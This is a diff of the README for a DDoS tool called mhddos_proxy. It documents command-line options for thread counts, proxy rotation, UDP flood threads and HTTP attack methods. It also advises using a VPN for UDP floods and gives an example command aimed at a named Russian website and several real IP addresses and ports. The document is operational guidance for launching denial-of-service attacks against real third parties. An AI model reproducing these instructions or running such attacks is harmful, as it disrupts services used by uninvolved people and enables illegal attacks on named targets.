udjfvnsaoepna/mhddos_proxy/README.md

     python3 runner.py --help

-    usage: runner.py [-h]
+    usage: runner.py target [target ...]
                      [-t THREADS]
                      [-p PERIOD]
                      [--proxy-timeout TIMEOUT]
                      [--rpc RPC]
                      [--http-methods METHOD [METHOD ...]]
-                     target [target ...]

     positional arguments:
       targets                List of targets, separated by space

     optional arguments:
-      -h, --help             show this help message and exit -t 100                 Number of threads per CPU core (default is 100) -p 300                 How often to update the proxies (default is 300) --proxy-timeout 3      How many seconds to wait for the proxy to make a connection.
+      -h, --help             show this help message and exit -t, --threads 100      Number of threads per CPU core (default is 100) -p, --period 300       How often to update the proxies (default is 300) --proxy-timeout 3      How many seconds to wait for the proxy to make a connection.
                              Higher values give more proxies, but with lower speed/quality.
                              Parsing also takes more time (default is 3)

-      --rpc 100              How many requests to send on a single proxy connection (default is 100)
+      --rpc 100              How many requests to send on a single proxy connection (default is 100) --udp-threads 1        Threads to run per UDP target (default is 1)

       --http-methods GET     List of HTTP(s) attack methods to use.
-                             Default is GET, STRESS, BOT, DOWNLOADER.
+                             (default is GET, STRESS, BOT, DOWNLOADER)
                              Refer to MHDDoS docs for available options (https://github.com/MHProDev/MHDDoS)

 # Examples

 For HTTP(S) targets, attack method is randomly selected from `--http-methods` option (see above for the default).

 For TCP targets, attack method is TCP FLOOD

-For UDP targets, attack method is UDP FLOOD. **VPN IS REQUIRED FOR UDP**, proxying is not supported.
+For UDP targets, attack method is UDP FLOOD.
+**VPN IS REQUIRED FOR UDP**, proxying is not supported.
+Separate parameter `--udp-threads` controls the load, the default is 1, **INCREASE SLOWLY**, be careful

     python3 runner.py https://tvzvezda.ru 5.188.56.124:9000 tcp://194.54.14.131:4477 udp://217.175.155.100:53